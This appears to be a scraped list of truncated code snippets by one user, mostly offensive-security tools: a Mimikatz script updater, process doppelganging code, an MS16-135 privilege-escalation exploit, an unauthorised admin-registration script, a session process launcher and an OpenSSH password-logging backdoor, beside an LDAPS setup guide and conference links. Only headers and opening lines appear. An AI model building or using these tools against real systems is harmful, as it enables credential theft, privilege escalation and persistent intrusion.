Tom4t0

using System;
using System.Diagnostics;
using System.Runtime.InteropServices;

namespace BlockDllTest
{
    class Program
    {
        static void Main(string[] args)
        {

Tom4t0

 <#
    .Synopsis
        Invoke-UpdateMimikatzScript created by Hashim Jawad (@ihack4falafel)
    .DESCRIPTION
       Convert x64/x86 powerkatz.dll to Base64 string and then update Invoke-Mimikatz.ps1 script from Empire, see the link https://raw.githubusercontent.com/EmpireProject/Empire/dev/data/module_source/credentials/Invoke-Mimikatz.ps1
    .PARAMETER DllPath
       Path to powerkatz.dll generated via Visual Studio.
    .PARAMETER ScriptPath
       Path to Invoke-Mimikatz.ps1 script.

Tom4t0

//
// Ref = src
// https://www.blackhat.com/docs/eu-17/materials/eu-17-Liberman-Lost-In-Transaction-Process-Doppelganging.pdf
//
// Credits:
//  Vyacheslav Rusakov @swwwolf
//  Tom Bonner @thomas_bonner
//

#include <Windows.h>

Tom4t0

Enable LDAP over SSL (LDAPS) for Microsoft Active Directory servers

By default Microsoft active directory servers will offer LDAP connections over unencrypted connections (boo!).

The steps below will create a new self signed certificate appropriate for use with and thus enabling LDAPS for an AD server. Of course the "self-signed" portion of this guide can be swapped out with a real vendor purchased certificate if required.

Steps have been tested successfully with Windows Server 2012R2, but should work with Windows Server 2008 without modification. Requires a working OpenSSL install (ideally Linux/OSX) and (obviously) a Windows Active Directory server.

• Create root certificate
• Import root certificate into trusted store of domain controller
• Create client certificate

Tom4t0

import requests
def register(url):
	reg_url = url + '/doregister.do'
	post_data = {'username':'admin','password':'admin123','repassword':'admin123','isadmin':'1'}
	resp = requests.post(url=reg_url,data=post_data)


def login(url):
	req = requests.Session()
	login_url = url + '/login.do'

Tom4t0

import socket
import random
import argparse
import sys
from io import BytesIO

# Referrer: https://github.com/wuyunfeng/Python-FastCGI-Client

PY2 = True if sys.version_info.major == 2 else False

Tom4t0

function Invoke-MS16-135 {
<#
.SYNOPSIS
    
    PowerShell implementation of MS16-135. The exploit targets all vulnerable
    operating systems that support PowerShell v2+. 
    
    * Win7-Win10 <== 64 bit!
.PARAMETER Application
Specifies an Application to run.

Tom4t0

Function Start-ProcessInSession {
	<#
	.SYNOPSIS
		Start a process in a different session on the same server when MS17-0100 is not installed
	.DESCRIPTION
		Based on the work of James Foreshaw
		
		https://bugs.chromium.org/p/project-zero/issues/detail?id=1021
	.PARAMETER SessionID
		The SessionID where you want to pop a process. Use quser to find all SessionID's on a terminal server

Tom4t0

#!/bin/bash
# ============================================
# satyr's openssh autobackdooring doohicky v0.-1
#  ImpendingSatyr@gmail.com
# ============================================
# USAGE:
#      Run this script with no args and it'll prompt for the "Magic" password and location to log passwords to (incoming and outgoing).
#      If you give the location that passwords will be logged to as an arg, this script will try to automate almost everything
#      (Like common openssh compiling problems, such as missing pam, kerberos, zlib, openssl-devel, etc.
#      [it'll install them via apt or yum, whichever is available]).

Tom4t0

RSA 2017 DevOOPS: Attacks And Defenses For DevOps Toolchains Talk Links  SessionID: HTA-W02

https://www.slideshare.net/chrisgates/devoops-attacks-and-defenses-for-devops-toolchains

Past talks:
http://www.slideshare.net/KenJohnson61/aws-surival-guide

[Ken Johnson earlier talk on AWS security, dedicated to using these services (cloudwatch/config/cloudtrail)]
https://www.youtube.com/watch?v=g-wy9NdATtA&feature=youtu.be